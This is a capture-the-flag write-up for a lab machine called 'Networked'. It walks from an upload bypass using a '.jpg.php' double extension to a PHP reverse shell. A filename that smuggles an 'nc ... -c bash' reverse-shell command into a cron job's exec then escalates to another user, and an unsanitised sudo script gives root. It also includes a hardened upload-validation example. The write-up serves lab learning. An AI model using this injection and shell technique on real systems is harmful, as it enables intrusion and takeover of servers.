# Networked

## Gaining Access

Nmap scan:

<figure><img src="/files/AT5G488aMK7Hy09Kp4rD" alt=""><figcaption></figcaption></figure>

### File Upload RCE

First, we can use `gobuster` on the website:

<figure><img src="/files/ROWvogTopJP6LaS2e1FW" alt=""><figcaption></figcaption></figure>

The `/backup` directory lists a backup archive:

<figure><img src="/files/s7EQiWzUR4FIX47F97MA" alt=""><figcaption></figcaption></figure>

Within the backup, the upload handler contains this PHP code:

```php
<?php
require '/var/www/html/lib.php';

define("UPLOAD_DIR", "/var/www/html/uploads/");

if( isset($_POST['submit']) ) {
  if (!empty($_FILES["myFile"])) {
    $myFile = $_FILES["myFile"];

    if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) {
      echo '<pre>Invalid image file.</pre>';
      displayform();
    }

    if ($myFile["error"] !== UPLOAD_ERR_OK) {
        echo "<p>An error occurred.</p>";
        displayform();
        exit;
    }

    //$name = $_SERVER['REMOTE_ADDR'].'-'. $myFile["name"];
    list ($foo,$ext) = getnameUpload($myFile["name"]);
    $validext = array('.jpg', '.png', '.gif', '.jpeg');
    $valid = false;
    foreach ($validext as $vext) {
      if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) {
        $valid = true;
      }
    }

    if (!($valid)) {
      echo "<p>Invalid image file</p>";
      displayform();
      exit;
    }
    $name = str_replace('.','_',$_SERVER['REMOTE_ADDR']).'.'.$ext;

    $success = move_uploaded_file($myFile["tmp_name"], UPLOAD_DIR . $name);
    if (!$success) {
        echo "<p>Unable to save file.</p>";
        exit;
    }
    echo "<p>file uploaded, refresh gallery</p>";

    // set proper permissions on the new file
    chmod(UPLOAD_DIR . $name, 0644);
  }
} else {
  displayform();
}
?>
```

In short, this file checks the file extension before accepting an upload. Since the server runs PHP, we can attempt to upload a PHP reverse shell. To bypass the extension check, notice that the only name check is a `substr_compare` against the allow-listed extensions, so the handler merely verifies that a valid extension is present in the name rather than validating the whole filename. As such, we can create a file ending in `.jpg.php` to bypass this:
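As an added example (not the box's code or the author's), here is how the name and content checks in that handler could be hardened so that neither a double extension nor a name containing shell metacharacters reaches the filesystem. The helper names and sample filenames are constructed for illustration, and the body check assumes the PHP `fileinfo` extension is available.

```php
<?php
// Hardened replacement for the checks in the upload handler above (added example).
// Allow-list of extensions and the MIME type finfo must detect for each.
const ALLOWED_TYPES = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
];

// Return the allow-listed extension for $clientName, or null to reject it.
// Only the final extension counts, so "shell.jpg.php" is rejected outright,
// while "shell.php.jpg" yields "jpg" and must still pass the content check.
function allowed_extension(string $clientName): ?string
{
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    return array_key_exists($ext, ALLOWED_TYPES) ? $ext : null;
}

// Check the body, not the name: the type detected from the magic bytes
// must match the type the extension claims.
function content_matches(string $ext, string $bytes): bool
{
    $detected = (new finfo(FILEINFO_MIME_TYPE))->buffer($bytes);
    return $detected === ALLOWED_TYPES[$ext];
}

// Server-generated name: random hex plus the validated extension. Nothing the
// client chose reaches the filesystem, so metacharacters in the original name
// can never be handed to a later exec() (as the cron job on this box does),
// and the stored name has exactly one dot, so Apache sees a single extension.
function storage_name(string $ext): string
{
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample names, not files from the box.
foreach (['photo.JPG', 'shell.php.jpg', 'shell.jpg.php', '; id.png'] as $name) {
    $ext = allowed_extension($name);
    printf("%-15s -> %s\n", $name, $ext === null ? 'rejected' : 'stored as ' . storage_name($ext));
}

// Constructed bodies: a PNG signature passes for .png, PHP source does not.
$png = "\x89PNG\r\n\x1a\n" . str_repeat("\0", 16);
var_dump(content_matches('png', $png));
var_dump(content_matches('png', "<?php echo 1; ?>"));
```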

<figure><img src="/files/f1H07xtYyPbkS1Eg8cZo" alt=""><figcaption></figcaption></figure>

Then, we can upload it via `upload.php` and visit `photos.php` to trigger the shell:

<figure><img src="/files/GKr8rcmz83p8Wqhk0MQk" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/Y3ysCvvtDk9Bo8Po9vAm" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

### To Guly

On the machine, we can look at the home directory of the user `guly`:

<figure><img src="/files/uxud4ulZxZMi8IQF8Ela" alt=""><figcaption></figcaption></figure>

The crontab shows that `guly` runs the `check_attack` script periodically.

<figure><img src="/files/R4Hw6aCt56FFOR8Ur46g" alt=""><figcaption></figcaption></figure>

One dangerous part of this script is its use of `exec` to run commands built from filenames. The `$value` variable is not sanitised, so we can exploit this by creating a file named `; nc 10.10.16.5 4444 -c bash` within the `/var/www/html/uploads` directory. Once the cron job runs, we get a reverse shell and can capture the user flag:

<figure><img src="/files/HYdUvRjreRFHcrzk7Ja9" alt=""><figcaption></figcaption></figure>

### To Root

We can check the `sudo` privileges of this user and find that there's one script we can run as `root`.

<figure><img src="/files/zlcvajsjBLeTObeLfysy" alt=""><figcaption></figcaption></figure>

Here's the script's contents:

<figure><img src="/files/PTfchmwv505G8gjY7BUk" alt=""><figcaption></figcaption></figure>

This takes user input and executes it without any sanitisation. When we run the script, we can actually execute commands:

<figure><img src="/files/anVyJH59WdgxYWCAuJBw" alt=""><figcaption></figcaption></figure>

To get a `root` shell, we just need to run `/bin/bash`:

<figure><img src="/files/JbqBKbMbvceEt2jhVglY" alt=""><figcaption></figcaption></figure>

Rooted!
